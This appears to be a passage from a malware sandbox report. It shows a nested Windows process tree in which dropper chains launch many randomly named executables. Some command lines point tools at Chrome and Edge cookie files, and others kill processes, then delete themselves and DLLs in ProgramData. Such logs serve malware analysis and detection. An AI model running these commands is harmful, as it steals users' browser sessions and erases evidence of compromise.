                                                                                                                                    • C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                      C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                      12⤵
                                                                                                                                        PID:6896
                                                                                                                                      • C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                        C:\Users\Admin\Documents\Ot_SlZtzmaFSxP7pOl2X6IGo.exe
                                                                                                                                        12⤵
                                                                                                                                          PID:6924
                                                                                                                                      • C:\Users\Admin\Documents\mEZ95dvRpfK6ASu2yrpoPOyD.exe
                                                                                                                                        "C:\Users\Admin\Documents\mEZ95dvRpfK6ASu2yrpoPOyD.exe"
                                                                                                                                        11⤵
                                                                                                                                          PID:2080
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                            C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                            12⤵
                                                                                                                                              PID:4680
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                "{path}"
                                                                                                                                                13⤵
                                                                                                                                                  PID:6316
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                  "{path}"
                                                                                                                                                  13⤵
                                                                                                                                                    PID:6152
                                                                                                                                              • C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe
                                                                                                                                                "C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe"
                                                                                                                                                11⤵
                                                                                                                                                  PID:4976
                                                                                                                                                  • C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe
                                                                                                                                                    "C:\Users\Admin\Documents\rNsiGmcBP6D1mMOtW35EtgKU.exe" -a
                                                                                                                                                    12⤵
                                                                                                                                                      PID:5572
                                                                                                                                                  • C:\Users\Admin\Documents\JQ_XGvgpuevm53n2BK5KnMha.exe
                                                                                                                                                    "C:\Users\Admin\Documents\JQ_XGvgpuevm53n2BK5KnMha.exe"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:5444
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\7823546.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\7823546.exe"
                                                                                                                                                        12⤵
                                                                                                                                                          PID:6456
                                                                                                                                                      • C:\Users\Admin\Documents\e_vHsxZZxEUwNFpdvuZxcCyJ.exe
                                                                                                                                                        "C:\Users\Admin\Documents\e_vHsxZZxEUwNFpdvuZxcCyJ.exe"
                                                                                                                                                        11⤵
                                                                                                                                                          PID:6416
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                            12⤵
                                                                                                                                                              PID:6668
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\setup_install.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\setup_install.exe"
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:7052
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                    14⤵
                                                                                                                                                                      PID:6176
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_2.exe
                                                                                                                                                                        karotima_2.exe
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:6312
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_2.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_2.exe" -a
                                                                                                                                                                            16⤵
                                                                                                                                                                              PID:6616
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                          14⤵
                                                                                                                                                                            PID:6164
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC0A2B756\karotima_1.exe
                                                                                                                                                                              karotima_1.exe
                                                                                                                                                                              15⤵
                                                                                                                                                                                PID:2400
                                                                                                                                                                                • C:\Users\Admin\Documents\9wN6u1UmsvgI02kNQacTmJ3A.exe
                                                                                                                                                                                  "C:\Users\Admin\Documents\9wN6u1UmsvgI02kNQacTmJ3A.exe"
                                                                                                                                                                                  16⤵
                                                                                                                                                                                    PID:6496
                                                                                                                                                                                  • C:\Users\Admin\Documents\Vqr7h6Xa7wPt6aoSDo_IIabl.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\Vqr7h6Xa7wPt6aoSDo_IIabl.exe"
                                                                                                                                                                                    16⤵
                                                                                                                                                                                      PID:5032
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                        17⤵
                                                                                                                                                                                          PID:5800
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                            "{path}"
                                                                                                                                                                                            18⤵
                                                                                                                                                                                              PID:3596
                                                                                                                                                                                        • C:\Users\Admin\Documents\hF6pyBfC12ZGzTEGS16yX72S.exe
                                                                                                                                                                                          "C:\Users\Admin\Documents\hF6pyBfC12ZGzTEGS16yX72S.exe"
                                                                                                                                                                                          16⤵
                                                                                                                                                                                            PID:3556
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                              17⤵
                                                                                                                                                                                                PID:5884
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                17⤵
                                                                                                                                                                                                  PID:7956
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                    PID:7392
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                      PID:8084
                                                                                                                                                                                                  • C:\Users\Admin\Documents\Bl91Pqh5P5InOWdNezzApCG2.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\Bl91Pqh5P5InOWdNezzApCG2.exe"
                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                      PID:6556
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5683499.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5683499.exe"
                                                                                                                                                                                                        17⤵
                                                                                                                                                                                                          PID:6164
                                                                                                                                                                                                      • C:\Users\Admin\Documents\ngSIlRLwY6Rd3ceTsN1bzm31.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\ngSIlRLwY6Rd3ceTsN1bzm31.exe"
                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                          PID:496
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im ngSIlRLwY6Rd3ceTsN1bzm31.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ngSIlRLwY6Rd3ceTsN1bzm31.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                            17⤵
                                                                                                                                                                                                              PID:7636
                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                taskkill /im ngSIlRLwY6Rd3ceTsN1bzm31.exe /f
                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:7900
                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                timeout /t 6
                                                                                                                                                                                                                18⤵
                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                PID:7900
                                                                                                                                                                                                          • C:\Users\Admin\Documents\09IfAsOfHYIMi67drBgecp75.exe
                                                                                                                                                                                                            "C:\Users\Admin\Documents\09IfAsOfHYIMi67drBgecp75.exe"
                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                              PID:4872
                                                                                                                                                                                                            • C:\Users\Admin\Documents\9esa4ZVkWERcpk_pYxvmedMn.exe
                                                                                                                                                                                                              "C:\Users\Admin\Documents\9esa4ZVkWERcpk_pYxvmedMn.exe"
                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                PID:4780
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                  17⤵
                                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\setup_install.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS4D330317\setup_install.exe"
                                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                                        PID:6052
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                          19⤵
                                                                                                                                                                                                                            PID:5216
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_2.exe
                                                                                                                                                                                                                              karotima_2.exe
                                                                                                                                                                                                                              20⤵
                                                                                                                                                                                                                                PID:7196
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_2.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_2.exe" -a
                                                                                                                                                                                                                                  21⤵
                                                                                                                                                                                                                                    PID:7804
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                19⤵
                                                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4D330317\karotima_1.exe
                                                                                                                                                                                                                                    karotima_1.exe
                                                                                                                                                                                                                                    20⤵
                                                                                                                                                                                                                                      PID:2400
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe"
                                                                                                                                                                                                                                        21⤵
                                                                                                                                                                                                                                          PID:6260
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                            C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                              C:\Users\Admin\Documents\qsUimIUWgEjlf3xaTjPyXqJa.exe
                                                                                                                                                                                                                                              22⤵
                                                                                                                                                                                                                                                PID:7452
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe"
                                                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                                                PID:7292
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                                  22⤵
                                                                                                                                                                                                                                                    PID:1452
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im KHHiKkhozceUZWUNRNFYQnBP.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                      23⤵
                                                                                                                                                                                                                                                        PID:8100
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                          taskkill /im KHHiKkhozceUZWUNRNFYQnBP.exe /f
                                                                                                                                                                                                                                                          24⤵
                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                          PID:6564
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\KHHiKkhozceUZWUNRNFYQnBP.exe
                                                                                                                                                                                                                                                      22⤵
                                                                                                                                                                                                                                                        PID:6356
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\OXvywiP9FsBwPYPmR4qrU2TR.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\OXvywiP9FsBwPYPmR4qrU2TR.exe"
                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                        PID:7176
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp
                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                            PID:6832
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              cmd
                                                                                                                                                                                                                                                              23⤵
                                                                                                                                                                                                                                                                PID:7952
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                  findstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp
                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                    PID:7688
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.003\Acre.exe.com
                                                                                                                                                                                                                                                                    Acre.exe.com k
                                                                                                                                                                                                                                                                    24⤵
                                                                                                                                                                                                                                                                      PID:7196
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                      ping 127.0.0.1 -n 30
                                                                                                                                                                                                                                                                      24⤵
                                                                                                                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                                                                                                                      PID:7224
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\YMqflIHmlsZajUC5S884nVYz.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\YMqflIHmlsZajUC5S884nVYz.exe"
                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                  PID:7564
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\1234.exe 1234
                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                      PID:6676
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1234.exe
                                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                                                                          PID:8284
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe"
                                                                                                                                                                                                                                                                      21⤵
                                                                                                                                                                                                                                                                        PID:8008
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
                                                                                                                                                                                                                                                                          22⤵
                                                                                                                                                                                                                                                                            PID:6140
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\r6uaax_wcFQScToI36MUmvnf.exe
                                                                                                                                                                                                                                                                            22⤵
                                                                                                                                                                                                                                                                              PID:7728
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe"
                                                                                                                                                                                                                                                                            21⤵
                                                                                                                                                                                                                                                                              PID:7308
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\Documents\GUNBWnLBEZH_lhvePvcvPt9G.exe
                                                                                                                                                                                                                                                                                22⤵
                                                                                                                                                                                                                                                                                  PID:7436
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\cPOJLcKGVOGCb4cFQdssisXh.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\cPOJLcKGVOGCb4cFQdssisXh.exe"
                                                                                                                                                                                                                                                                                21⤵
                                                                                                                                                                                                                                                                                  PID:7976
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                                                                    22⤵
                                                                                                                                                                                                                                                                                      PID:5044
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\setup_install.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\7zS4B320207\setup_install.exe"
                                                                                                                                                                                                                                                                                        23⤵
                                                                                                                                                                                                                                                                                          PID:7592
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                            24⤵
                                                                                                                                                                                                                                                                                              PID:7320
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_2.exe
                                                                                                                                                                                                                                                                                                karotima_2.exe
                                                                                                                                                                                                                                                                                                25⤵
                                                                                                                                                                                                                                                                                                  PID:6332
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_2.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                    26⤵
                                                                                                                                                                                                                                                                                                      PID:7488
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                  24⤵
                                                                                                                                                                                                                                                                                                    PID:3168
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4B320207\karotima_1.exe
                                                                                                                                                                                                                                                                                                      karotima_1.exe
                                                                                                                                                                                                                                                                                                      25⤵
                                                                                                                                                                                                                                                                                                        PID:7120
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe"
                                                                                                                                                                                                                                                                                                          26⤵
                                                                                                                                                                                                                                                                                                            PID:2180
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe
                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\hfWuOuLB_CxAlkszPbzo7zMN.exe
                                                                                                                                                                                                                                                                                                              27⤵
                                                                                                                                                                                                                                                                                                                PID:2208
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\PdBFxMylOJlDXNrcPAijUyx8.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\PdBFxMylOJlDXNrcPAijUyx8.exe"
                                                                                                                                                                                                                                                                                                              26⤵
                                                                                                                                                                                                                                                                                                                PID:5376
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                                                                                                                                                                                                  27⤵
                                                                                                                                                                                                                                                                                                                    PID:1640
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\setup_install.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS86684A08\setup_install.exe"
                                                                                                                                                                                                                                                                                                                      28⤵
                                                                                                                                                                                                                                                                                                                        PID:8568
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c karotima_2.exe
                                                                                                                                                                                                                                                                                                                          29⤵
                                                                                                                                                                                                                                                                                                                            PID:7432
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_2.exe
                                                                                                                                                                                                                                                                                                                              karotima_2.exe
                                                                                                                                                                                                                                                                                                                              30⤵
                                                                                                                                                                                                                                                                                                                                PID:3592
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_2.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_2.exe" -a
                                                                                                                                                                                                                                                                                                                                  31⤵
                                                                                                                                                                                                                                                                                                                                    PID:2580
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c karotima_1.exe
                                                                                                                                                                                                                                                                                                                                29⤵
                                                                                                                                                                                                                                                                                                                                  PID:8120
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS86684A08\karotima_1.exe
                                                                                                                                                                                                                                                                                                                                    karotima_1.exe
                                                                                                                                                                                                                                                                                                                                    30⤵
                                                                                                                                                                                                                                                                                                                                      PID:5800
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\Ua6FgA1rw251p8eT4xIj2yCW.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\Ua6FgA1rw251p8eT4xIj2yCW.exe"
                                                                                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                                                                                          PID:6556
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\0WOmwa3X2KuIkslrZEE3kVBj.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\0WOmwa3X2KuIkslrZEE3kVBj.exe"
                                                                                                                                                                                                                                                                                                                                          31⤵
                                                                                                                                                                                                                                                                                                                                            PID:7608
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\nvnzJvEEMk5z4bVhBEy1qxDs.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\nvnzJvEEMk5z4bVhBEy1qxDs.exe"
                                                                                                                                                                                                                                                                                                                                            31⤵
                                                                                                                                                                                                                                                                                                                                              PID:5684
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe"
                                                                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                                                                PID:9168
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                  32⤵
                                                                                                                                                                                                                                                                                                                                                    PID:9996
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\cTlQKEusxNqxDtZNBX28Nb6A.exe
                                                                                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                                                                                      PID:10188
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\ABn2oRk0RoAhUpUDFvgBQR1J.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\ABn2oRk0RoAhUpUDFvgBQR1J.exe"
                                                                                                                                                                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8072
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\YyB2SFILAL3qOzsyzk7N3EDo.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\YyB2SFILAL3qOzsyzk7N3EDo.exe"
                                                                                                                                                                                                                                                                                                                                                      31⤵
                                                                                                                                                                                                                                                                                                                                                        PID:6544
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe"
                                                                                                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                                                                                                          PID:6844
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                            32⤵
                                                                                                                                                                                                                                                                                                                                                              PID:10036
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\Documents\e47bs_hN2OhDsoleVWOhtWzw.exe
                                                                                                                                                                                                                                                                                                                                                              32⤵
                                                                                                                                                                                                                                                                                                                                                                PID:10236
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\tfjcGSgvuqit4yR4akWFuG33.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\tfjcGSgvuqit4yR4akWFuG33.exe"
                                                                                                                                                                                                                                                                                                                                                              31⤵
                                                                                                                                                                                                                                                                                                                                                                PID:8800
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe"
                                                                                                                                                                                                                                                                                                                                                                31⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6368
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\1SL4oKDF5WS6n17rZgwiDl0I.exe
                                                                                                                                                                                                                                                                                                                                                                    32⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:9988
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\_CCT11xhwxsXDfZK_EVVvyAl.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\_CCT11xhwxsXDfZK_EVVvyAl.exe"
                                                                                                                                                                                                                                                                                                                                                                    31⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4140
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Kt7NZh1VK_RT7jfMQUhYedwG.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\Kt7NZh1VK_RT7jfMQUhYedwG.exe"
                                                                                                                                                                                                                                                                                                                                                                      31⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:9272
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\zGjdQ_EBW5K1SjoC5EMfr7Td.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\zGjdQ_EBW5K1SjoC5EMfr7Td.exe"
                                                                                                                                                                                                                                                                                                                                                                        31⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:9292
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\jLOTVVrM0LYmMjiHDBHitCCE.exe"
